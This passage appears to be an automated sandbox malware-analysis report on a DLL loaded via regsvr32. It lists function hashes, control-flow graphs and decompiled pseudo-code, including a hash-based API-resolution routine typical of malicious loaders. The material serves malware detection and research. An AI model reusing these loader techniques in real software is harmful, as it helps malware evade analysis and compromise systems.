c006b9-c006bd 107->116 117 c006ce-c006d8 107->117 115 c0064e-c00651 108->115 109->71 110->109 112->93 126 c0078f-c00794 112->126 113->112 119 c00759-c00762 114->119 120 c00653-c00659 115->120 121 c0065b-c00666 115->121 116->117 124 c006bf-c006c3 116->124 117->84 123 c006de-c006df 117->123 119->113 119->119 125 c0068d-c006a3 120->125 127 c00676-c00688 121->127 128 c00668-c00669 121->128 123->72 124->117 129 c006c5 124->129 132 c006a5-c006aa 125->132 133 c006ac 125->133 126->94 127->125 130 c0066b-c00674 128->130 129->117 130->127 130->130 132->115 133->107
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373580197.0000000000C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_c00000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
                                                                                                    • String ID: Cach$Flus$GetN$Libr$Load$RtlA$Slee$Virt$Virt$aryA$ativ$ct$ddFu$eSys$hIns$lloc$ncti$nf$o$onTa$rote$temI$tion$truc$ualA$ualP
                                                                                                    • API String ID: 394283112-3605381585
                                                                                                    • Opcode ID: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
                                                                                                    • Instruction ID: 800b158da025e80a3dafa077523bd6bdc72b7267c2bcb4d44b67090e9fb3e04d
                                                                                                    • Opcode Fuzzy Hash: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
                                                                                                    • Instruction Fuzzy Hash: 02521530618B488BC719DF18D8857BAB7F1FB94304F25462DE89BC7291DB34E946CB86
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0000000180048DE0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68librarymemorynativeCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessAllocateFindMemoryResourceResource_Virtualatoi
                                                                                                    • String ID: TZU
                                                                                                    • API String ID: 1851990705-3483455451
                                                                                                    • Opcode ID: 185046592e8f41db69672b95e8b299d643dd31c494f7b0e8666df550f3d7dddd
                                                                                                    • Instruction ID: e725bb512faadc6cb7ba02e487874f8ed370321ce157a2d5c9638f137fa6d549
                                                                                                    • Opcode Fuzzy Hash: 185046592e8f41db69672b95e8b299d643dd31c494f7b0e8666df550f3d7dddd
                                                                                                    • Instruction Fuzzy Hash: 6A311C36218F8892E791CF15F48079AB7A4F788785F915126FA9E43B28DF38C649CB04
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0000000180048CF0 Relevance: 7.5, APIs: 5, Instructions: 48nativethreadCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LinkObjectOpenSymbolic$AccessAlertAllocateExitFindMemoryProcessQueueResourceResource_TestThreadVirtualWow64atoi
                                                                                                    • String ID:
                                                                                                    • API String ID: 315797399-0
                                                                                                    • Opcode ID: 964d316edaff62560e65bdfc5b6d39802a6d410e5cc5e2bd37524f513a99bef6
                                                                                                    • Instruction ID: 0dc1b33189f16239657e897d87c475c9730bc72055ec902d571a50a7d6765165
                                                                                                    • Opcode Fuzzy Hash: 964d316edaff62560e65bdfc5b6d39802a6d410e5cc5e2bd37524f513a99bef6
                                                                                                    • Instruction Fuzzy Hash: 65115931614F0882F7969F64F8807AA33A5FB887C5F41C115FA4542BA4EF3DC659C708
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0261AFF8 Relevance: 6.5, Strings: 5, Instructions: 297COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: dI/$'$f2$mZf$oP
                                                                                                    • API String ID: 0-4283282001
                                                                                                    • Opcode ID: bb253dde6279376312636867aec5bfef6d5611f82a766cb8573511dc974c4ee8
                                                                                                    • Instruction ID: 00a91d6acae1b78ca121fec505f407cf6dfcf1af542db96c24ab1658375bff10
                                                                                                    • Opcode Fuzzy Hash: bb253dde6279376312636867aec5bfef6d5611f82a766cb8573511dc974c4ee8
                                                                                                    • Instruction Fuzzy Hash: 2AE1BC7151A780AFD388CF29C5C990BBBF1FB84758F806A1DF896862A0D7B4D944CF42
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0261708C Relevance: 6.4, Strings: 5, Instructions: 181COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 286 261708c-26170b3 287 26170b5-26170ba 286->287 288 26170c0-26170c5 287->288 289 2617294-26172fe call 2618b8c 287->289 291 26170cb-26170d0 288->291 292 26171fc-261728f call 2611d40 288->292 294 2617303-2617309 289->294 295 2617141-26171ec call 26269a4 291->295 296 26170d2-26170d7 291->296 292->287 299 261730b-2617312 294->299 300 261731c-261738b call 2622b28 294->300 304 261739b-26173ad 295->304 308 26171f2-26171f7 295->308 301 2617390-2617395 296->301 302 26170dd-261713c call 2601d94 296->302 299->300 300->301 301->287 301->304 302->287 308->287
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: =%$GY$HV$Uf$V
                                                                                                    • API String ID: 0-3695655472
                                                                                                    • Opcode ID: a6f25d5acbbb68c8feb095f5507bb11695514a1132e8f80d93d0f4f72801fad1
                                                                                                    • Instruction ID: 211af84b849ee850f98ec61e119d39677df80b501bdb56b0dc73758b22527132
                                                                                                    • Opcode Fuzzy Hash: a6f25d5acbbb68c8feb095f5507bb11695514a1132e8f80d93d0f4f72801fad1
                                                                                                    • Instruction Fuzzy Hash: 0191E4B450034A8BDB48DF24D88A4DE3FA1FB18398F555229FC4AA7290C778E695CFC5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02617B38 Relevance: 5.7, Strings: 4, Instructions: 704COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: +i?2$4C$Sb$|]
                                                                                                    • API String ID: 0-3628449640
                                                                                                    • Opcode ID: a3245d5bdc0e83662ad0375a61ca6e63a37e8d8dbc23c4569dc3d6361574e060
                                                                                                    • Instruction ID: dd4b37d1ae1f88c91a072c875aa29ada547101eaa19b5d1e66fe70a25ac322d1
                                                                                                    • Opcode Fuzzy Hash: a3245d5bdc0e83662ad0375a61ca6e63a37e8d8dbc23c4569dc3d6361574e060
                                                                                                    • Instruction Fuzzy Hash: 4662967150068E8BDF48DF28C89A5DE3BA1FB58348F16431DFC8AA62A0D778D555CBC8
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 026015AC Relevance: 5.1, Strings: 4, Instructions: 149COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 430 26015ac-2601684 call 2614df4 call 2602aa4 435 260168a-2601753 call 260c2cc 430->435 436 26017db-26017f2 430->436 438 2601758-26017d6 call 2622184 435->438 438->436
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: #H$d4s$d4s$r
                                                                                                    • API String ID: 0-2729258563
                                                                                                    • Opcode ID: 6fc46ebc6b32b921f5b737df9627800b7f3f7fb3f8b5c5ebbb951030a07b286e
                                                                                                    • Instruction ID: 8a7ee1d8f6482f5743a16ba56ea85607f69f16f153591ea399e5db75ad8812a7
                                                                                                    • Opcode Fuzzy Hash: 6fc46ebc6b32b921f5b737df9627800b7f3f7fb3f8b5c5ebbb951030a07b286e
                                                                                                    • Instruction Fuzzy Hash: D461E2B1D147488FDB48CFA8D88A4DDBBF0FB58318F118219E889B7290D7B89945CF59
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0261F5E8 Relevance: 4.0, Strings: 3, Instructions: 289COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 440 261f5e8-261f610 441 261f61a 440->441 442 261f61c-261f622 441->442 443 261f9d5-261f9e2 442->443 444 261f628-261f62e 442->444 445 261f9e4-261fa1d 443->445 446 261fa1f-261fa3a 443->446 447 261f630-261f636 444->447 448 261f643-261f865 call 260a2d4 call 26095a4 444->448 449 261fa44-261fc90 call 261f280 call 26095a4 call 26029cc 445->449 446->449 450 261fcb5-261fcbb 447->450 451 261f63c-261f641 447->451 461 261f867 448->461 462 261f86c-261f9ca call 26095a4 call 26029cc 448->462 465 261fc95-261fc9f 449->465 450->442 455 261fcc1-261fcce 450->455 451->442 461->462 462->455 471 261f9d0 462->471 467 261fca1-261fcab 465->467 468 261fcb0 465->468 467->442 468->450 471->441
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: =2($NA$\
                                                                                                    • API String ID: 0-2068415259
                                                                                                    • Opcode ID: f5a10cdb5c95e7e7fc9647f135050832432af5277eaf9ae4061fa040374f5e0c
                                                                                                    • Instruction ID: f4507d517bf2771d8c8a44176f1746b56033234e07c61c6a6d9261d3ff4c1223
                                                                                                    • Opcode Fuzzy Hash: f5a10cdb5c95e7e7fc9647f135050832432af5277eaf9ae4061fa040374f5e0c
                                                                                                    • Instruction Fuzzy Hash: 97F1C6716043C88FDBBECF24C8896DA7BA9FB46708F504219EDCA8E294DB745745CB42
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 026098C8 Relevance: 2.7, Strings: 2, Instructions: 206COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 515 26098c8-2609919 call 2614df4 518 2609921-2609926 515->518 519 2609c84-2609c94 call 2619cc4 518->519 520 260992c-2609931 518->520 531 2609ca0 519->531 532 2609c96-2609c9b 519->532 521 2609937-260993c 520->521 522 2609b5b-2609c68 call 2628f14 520->522 524 2609942-2609947 521->524 525 2609abc-2609b51 call 2621dfc 521->525 528 2609c6d-2609c74 522->528 529 2609a45-2609ab7 call 2622900 524->529 530 260994d-2609952 524->530 540 2609b56 Process32FirstW 525->540 534 2609c7a-2609c7f 528->534 535 2609a1d-2609a35 528->535 529->518 536 2609a36-2609a40 530->536 537 2609958-260995a 530->537 538 2609ca2-2609ca7 531->538 532->518 534->518 536->518 537->538 541 2609960-2609a18 call 2622184 537->541 538->535 542 2609cad 538->542 540->522 541->535 542->518
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: +(O$L
                                                                                                    • API String ID: 0-682801720
                                                                                                    • Opcode ID: 30026cb269a35efb0ea896fa4cf442a3a5c91c5594ac97f83ea84dfd99e09629
                                                                                                    • Instruction ID: cb2f85a92e35b25e8af0baf4d2403a74de20c7d79c26cf89d54e510c851b0aac
                                                                                                    • Opcode Fuzzy Hash: 30026cb269a35efb0ea896fa4cf442a3a5c91c5594ac97f83ea84dfd99e09629
                                                                                                    • Instruction Fuzzy Hash: B8A126705197849BD7A8DF28C4C959EBBF1FB84704F90691DF88A8B2A1DB74DA44CF02
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02610C08 Relevance: 2.7, Strings: 2, Instructions: 189COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: @:$}
                                                                                                    • API String ID: 0-1996894783
                                                                                                    • Opcode ID: 6ec3f9a420871cc8a789ef7be8ca0dcb857a1f9fb31b2223066a63c967e38ea2
                                                                                                    • Instruction ID: 91a7ed8ca861a37d0707b100cdc4b846a2443f913494d23adebfaf758f5769a5
                                                                                                    • Opcode Fuzzy Hash: 6ec3f9a420871cc8a789ef7be8ca0dcb857a1f9fb31b2223066a63c967e38ea2
                                                                                                    • Instruction Fuzzy Hash: 1FA1D77050074E8FDF98CF28C88A5DA3FA0FB28398F251219FC49A62A0D778D595CBC5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0260F578 Relevance: 2.6, Strings: 2, Instructions: 123COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: <J$L*7
                                                                                                    • API String ID: 0-1200042931
                                                                                                    • Opcode ID: fc1c3d0dd0b59280a88fd16bf3b557fee85770528049d2f90ffaf32cdfc10908
                                                                                                    • Instruction ID: c255745f909fc72fb78cdf4aca2c952f378e6a520cf8cc68cbd825ad898a2328
                                                                                                    • Opcode Fuzzy Hash: fc1c3d0dd0b59280a88fd16bf3b557fee85770528049d2f90ffaf32cdfc10908
                                                                                                    • Instruction Fuzzy Hash: EE61E6700083889FD7B8DF18D9855CABBF1FB85744FA0891DE9898B260CF759B85DB42
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02620880 Relevance: 1.5, Strings: 1, Instructions: 218COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: yU(
                                                                                                    • API String ID: 0-1444449062
                                                                                                    • Opcode ID: bc0941bba72f81f70943290a9271c74fd2646a44f3aa3a3cd7dd545814af1893
                                                                                                    • Instruction ID: e2a2522a8e5f957a9af54e4b7e4b0ff220dd0c7fbca83790bcf3da3699eaef6e
                                                                                                    • Opcode Fuzzy Hash: bc0941bba72f81f70943290a9271c74fd2646a44f3aa3a3cd7dd545814af1893
                                                                                                    • Instruction Fuzzy Hash: F2A1F171D247289FDB48CFA9D8898CDBBF1FB58318F108219E816B72A0C7785945CF69
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0000000180048A60 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 140windowregistryCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    C-Code - Quality: 91%
                                                                                                    			E00000001180048A60() {
				void* _t17;
				intOrPtr _t23;
				void* _t32;
				int _t35;
				intOrPtr _t36;
				void* _t37;
				void* _t38;
				void* _t39;
				long long _t40;
				long long _t41;
				long long _t42;
				void* _t44;
				void* _t46;
				signed char* _t47;
				void* _t49;
				long long _t52;
				long long _t54;

				_t32 = _t44;
				_t36 =  *0x8005f578;
				 *((long long*)(_t32 + 8)) = _t42;
				 *((long long*)(_t32 + 0x10)) = _t41;
				 *((long long*)(_t32 + 0x18)) = _t40;
				 *((long long*)(_t32 - 0x10)) = _t52;
				 *((long long*)(_t32 - 0x18)) = _t54;
				r15d = 0;
				r11d = r15d;
				_t38 = _t37 + _t36;
				r14d =  *((intOrPtr*)(_t38 + 0x24));
				r10d =  *((intOrPtr*)(_t38 + 0x20));
				_t23 =  *((intOrPtr*)(_t38 + 0x18));
				if (_t23 == 0) goto 0x80048b1b;
				r8d =  *((intOrPtr*)(_t49 + _t36));
				_t47 = _t46 + _t36;
				r9d =  *_t47 & 0x000000ff;
				if (r9b == 0) goto 0x80048b00;
				asm("o16 nop [eax+eax]");
				asm("ror eax, 0xd");
				r9d = _t47[1] & 0x000000ff;
				_t20 =  <  ? r9b : _t39 - 0x20;
				_t17 = r15d + ( <  ? r9b : _t39 - 0x20);
				if (r9b != 0) goto 0x80048ae0;
				if (_t41 +  *((intOrPtr*)(_t36 + 0x3c)) == 0x98cf2788) goto 0x80048cd1;
				r11d = r11d + 1;
				if (r11d - _t23 < 0) goto 0x80048ac0;
				ExitProcess(_t35);
			}




















                                                                                                    0x180048a60
                                                                                                    0x180048a6b
                                                                                                    0x180048a72
                                                                                                    0x180048a76
                                                                                                    0x180048a7a
                                                                                                    0x180048a7e
                                                                                                    0x180048a82
                                                                                                    0x180048a86
                                                                                                    0x180048a8d
                                                                                                    0x180048a97
                                                                                                    0x180048a9d
                                                                                                    0x180048aa4
                                                                                                    0x180048aab
                                                                                                    0x180048ab3
                                                                                                    0x180048ac0
                                                                                                    0x180048ac6
                                                                                                    0x180048ac9
                                                                                                    0x180048ad0
                                                                                                    0x180048ad6
                                                                                                    0x180048ae8
                                                                                                    0x180048aef
                                                                                                    0x180048af6
                                                                                                    0x180048af9
                                                                                                    0x180048afe
                                                                                                    0x180048b09
                                                                                                    0x180048b0f
                                                                                                    0x180048b19
                                                                                                    0x180048b1e

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$LoadWindow$StringTranslate$AcceleratorClassCreateCursorDispatchExitProcessRegisterShowUpdate
                                                                                                    • String ID: P
                                                                                                    • API String ID: 447067881-3110715001
                                                                                                    • Opcode ID: 5c101a74b832b5b883c3eb1091f14e3ff160d40798a5eb754ffde81291d1c501
                                                                                                    • Instruction ID: 202921a15001a5fb213d4a0ebedd9fa7cd14095cc82391c1f9ab2098e61e618b
                                                                                                    • Opcode Fuzzy Hash: 5c101a74b832b5b883c3eb1091f14e3ff160d40798a5eb754ffde81291d1c501
                                                                                                    • Instruction Fuzzy Hash: 9F61AE72208B8482E7A18F15E8807EEB7A1F78DBC9F558419FA8953B54DF3CC649CB04
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0000000180001640 Relevance: 19.7, APIs: 13, Instructions: 235COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 149 180001640-180001646 150 180001681-18000168b 149->150 151 180001648-18000164b 149->151 152 1800017ac-1800017c8 150->152 153 180001675-1800016b4 call 180001390 151->153 154 18000164d-180001650 151->154 158 1800017ca 152->158 159 1800017dc-1800017f7 call 180001224 152->159 172 1800016b6 153->172 173 1800016ce-1800016e3 call 180001224 153->173 156 180001652-180001655 154->156 157 180001668 __scrt_dllmain_crt_thread_attach 154->157 163 180001661-180001666 call 1800012d4 156->163 164 180001657-180001660 156->164 161 18000166d-180001674 157->161 165 1800017cc-1800017db 158->165 170 1800017f9-18000182c call 18000134c call 1800022a4 call 180002320 call 18000137c call 180001550 call 180001574 159->170 171 18000182e-180001860 call 180001f20 159->171 163->161 170->165 181 180001871-180001877 171->181 182 180001862-180001868 171->182 176 1800016b8-1800016cd 172->176 184 1800016e9-1800016fa call 180001294 173->184 185 18000179d-1800017ab call 180001f20 173->185 187 180001879-180001883 181->187 188 1800018be-1800018c6 call 180048cf0 181->188 182->181 186 18000186a-18000186c 182->186 200 18000174b-180001755 call 180001550 184->200 201 1800016fc-180001720 call 1800022e4 call 180002294 call 1800022c0 call 180011860 184->201 185->152 193 180001961-18000196e 186->193 194 180001885-18000188d 187->194 195 18000188f-18000189d 187->195 199 1800018cb-1800018d4 188->199 202 1800018a3-1800018ab call 180001640 194->202 195->202 216 180001957-18000195f 195->216 204 1800018d6-1800018d8 199->204 205 18000190e-180001910 199->205 200->172 219 18000175b-180001767 call 1800022dc 200->219 201->200 249 180001722-180001729 __scrt_dllmain_after_initialize_c 201->249 218 1800018b0-1800018b8 202->218 204->205 212 1800018da-1800018fe call 180048cf0 call 180001640 204->212 214 180001912-180001915 205->214 215 180001917-18000192c call 180001640 205->215 212->205 243 180001900-180001905 212->243 214->215 214->216 215->216 233 18000192e-180001938 215->233 216->193 218->188 218->216 235 180001769-180001773 call 1800014b4 219->235 236 18000178d-180001798 219->236 239 180001943-180001953 233->239 240 18000193a-180001941 233->240 235->236 248 180001775-180001783 235->248 236->176 239->216 240->216 243->205 248->236 249->200 250 18000172b-180001748 call 1800117e8 249->250 250->200
                                                                                                    C-Code - Quality: 100%
                                                                                                    			E00000001180001640(void* __edx) {
				void* _t5;

				_t5 = __edx;
				if (_t5 == 0) goto 0x80001681;
				if (_t5 == 0) goto 0x80001675;
				if (_t5 == 0) goto 0x80001668;
				if (__edx == 1) goto 0x80001661;
				return 1;
			}




                                                                                                    0x180001644
                                                                                                    0x180001646
                                                                                                    0x18000164b
                                                                                                    0x180001650
                                                                                                    0x180001655
                                                                                                    0x180001660

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Initialize__scrt_acquire_startup_lock__scrt_fastfail__scrt_release_startup_lock$__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_default_local_stdio_options__scrt_is_nonwritable_in_current_image__scrt_uninitialize_crt
                                                                                                    • String ID:
                                                                                                    • API String ID: 1988982384-0
                                                                                                    • Opcode ID: 3376119350a51d5d2e901c6f5fb601d87a64547b5d48cae0342726b0923ff2c4
                                                                                                    • Instruction ID: 04f0418400bd1eb027928acbee4890860fef8e2c8c1783792e375193baef01d1
                                                                                                    • Opcode Fuzzy Hash: 3376119350a51d5d2e901c6f5fb601d87a64547b5d48cae0342726b0923ff2c4
                                                                                                    • Instruction Fuzzy Hash: 4A91B03060464DCEFBE7EB66A8913D932A1AB8D7C5F44C016BA0947796DF38CB4D8704
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00000001800101CC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    C-Code - Quality: 52%
                                                                                                    			E000000011800101CC(void* __ecx, intOrPtr* __rax, long long __rbx, void* __rcx, void* __r8, long long _a8, signed int _a16, signed int _a24, signed int _a32) {
				long long _v56;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t27;
				intOrPtr _t36;
				intOrPtr* _t62;
				long long _t68;
				void* _t70;
				long long _t84;
				signed int _t85;
				intOrPtr* _t86;
				void* _t89;

				_t70 = __rcx;
				_a8 = __rbx;
				_t2 = _t70 - 1; // -1
				r14d = __ecx;
				if (_t2 - 1 <= 0) goto 0x80010200;
				_t27 = E0000000118002E69C(__rax);
				 *__rax = 0x16;
				E0000000118002E4F0(_t27);
				goto 0x8001032f;
				E0000000118002FFD0();
				r8d = 0x104;
				GetModuleFileNameA(??, ??, ??);
				_t86 =  *0x8005ea60; // 0xc33350
				 *0x8005ea70 = 0x8005e2f0;
				if (_t86 == 0) goto 0x80010237;
				if ( *_t86 != dil) goto 0x8001023a;
				_t62 =  &_a32;
				_a24 = _t85;
				_v56 = _t62;
				r8d = 0;
				_a32 = _t85;
				E0000000118000FC58(0x8005e2f0, 0x8005e2f0, 0x8005e2f0, _t85, 0x8005e2f0, _t89, __r8,  &_a24);
				r8d = 1;
				E00000001180010168(_a24, _a32, __r8); // executed
				_t68 = _t62;
				if (_t62 != 0) goto 0x8001028b;
				E0000000118002E69C(_t62);
				_t10 = _t68 + 0xc; // 0xc
				 *_t62 = _t10;
				goto 0x8001032a;
				_v56 =  &_a32;
				E0000000118000FC58(_t68, 0x8005e2f0, _t68, _t85, 0x8005e2f0, _t89, _t62 + _a24 * 8,  &_a24);
				if (r14d != 1) goto 0x800102c1;
				_t36 = _a24 - 1;
				 *0x8005ea50 = _t68;
				 *0x8005ea4c = _t36;
				goto 0x80010284;
				_a16 = _t85;
				0x8002f7cc();
				if (_t36 == 0) goto 0x800102f0;
				E0000000118002E8A0( &_a32, _a16);
				_a16 = _t85;
				E0000000118002E8A0( &_a32, _t68);
				goto 0x8001032f;
				_t84 = _a16;
				if ( *_t84 == _t85) goto 0x8001030b;
